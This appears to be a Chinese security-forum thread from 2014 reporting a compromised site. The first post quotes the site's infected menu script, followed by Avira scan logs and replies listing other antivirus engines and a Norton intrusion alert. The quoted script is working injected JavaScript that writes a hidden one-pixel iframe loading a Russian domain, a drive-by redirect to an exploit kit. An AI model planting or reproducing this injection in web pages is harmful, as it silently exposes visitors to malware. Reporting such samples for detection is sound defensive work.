kapatelu.clan.su/forum/8-209-1

显示全部楼层 · 发表于 2014-4-28 06:58:33

/*04b037*/
(function () { var ccs = document.createElement('iframe'); ccs.src = 'http://ecrihgep.ru/count10.php'; ccs.style.position = 'absolute'; ccs.style.border = '0'; ccs.style.height = '1px'; ccs.style.width = '1px'; ccs.style.left = '1px'; ccs.style.top = '1px'; if (!document.getElementById('ccs')) { document.write('<div id=\'ccs\'></div>'); document.getElementById('ccs').appendChild(ccs); }})();
/*/04b037*/

Avira

2014/4/28 上午 06:55 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\stmenu[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.CL.54' [virus]
   已採取動作：
   檔案會移動至 '56662b01.qua' 名稱底下的隔離區目錄!

2014/4/28 上午 06:55 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 817
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2014/4/28 上午 06:52 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\stmenu[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CL.54 [virus]'
   執行的動作：傳輸至掃描程式

2014/4/28 上午 06:52 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\stmenu[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CL.54 [virus]'
   執行的動作：拒絕存取

2014/4/28 上午 06:52 [Web Protection] 發現惡意程式碼
   從 URL "http://kapatelu.clan.su/menu/stmenu.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CL.54' [virus]。
   已採取動作：已略過

fs is

显示全部楼层 · 发表于 2014-4-28 11:56:34

显示全部楼层 · 发表于 2014-5-3 13:24:02

GDATA，ESET

显示全部楼层 · 发表于 2014-5-3 13:58:32

诺顿
类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2014/5/3 13:57:28,高,阻止了 kapatelu.clan.su 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 13,

[已鉴定] kapatelu.clan.su/forum/8-209-1